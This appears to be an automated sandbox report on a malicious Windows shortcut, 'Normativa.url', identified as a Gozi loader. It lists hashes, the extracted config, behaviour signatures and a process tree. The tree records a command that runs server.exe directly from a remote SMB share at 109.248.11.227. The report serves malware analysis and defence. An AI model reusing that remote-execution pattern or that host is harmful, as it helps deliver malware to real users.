Analysis
- max time kernel: 143s
- max time network: 144s
- platform: windows10-2004_x64
- resource: win10v2004-20230220-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20230220-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 22/03/2023, 07:23
- Static task: static1
- Behavioral task: behavioral1
- Sample: Normativa/Normativa.url
- Resource: win7-20230220-en
General
- Target: Normativa/Normativa.url
- Size: 194B
- MD5: 7223cc1975393443d4d161492d0f932e
- SHA1: 2fc8c648559e862b3191088450781b5d33debd5f
- SHA256: ec178c6a29aa42213ac7287e45d8378632e145ef650dd5734f247129bd364dbb
- SHA512: 5c5eec290b156c760c44dd9b7162a5cf9e3f2f4e1f9ef494dcbf5ef2f12fd51801b1170b36f39ab2342467f7701bfe4bd292b7cd5418c4b87717e7abfc31ef5a
Malware Config
Extracted
gozi
7715
- base_path: /drew/
- build: 250255
- exe_type: loader
- extension: .jlk
- server_id: 50
Extracted
gozi
Signatures
- Checks computer location settings (2 TTPs, 1 IoC)
  Looks up country code configured in the registry, likely geofence.
  Key value queried: \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation (process: rundll32.exe)
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Suspicious use of WriteProcessMemory (3 IoCs)
  PID 2428 (rundll32.exe) wrote to memory of PID 4780 (procid_target 86); reported as 3 identical entries.
Processes
- C:\Windows\System32\rundll32.exe (PID 2428, depth 1)
  Command line: "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL C:\Users\Admin\AppData\Local\Temp\Normativa\Normativa.url
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  - Child: \??\UNC\109.248.11.227\Agenzia\server.exe (PID 4780, depth 2)
    Command line: "\\109.248.11.227\Agenzia\server.exe"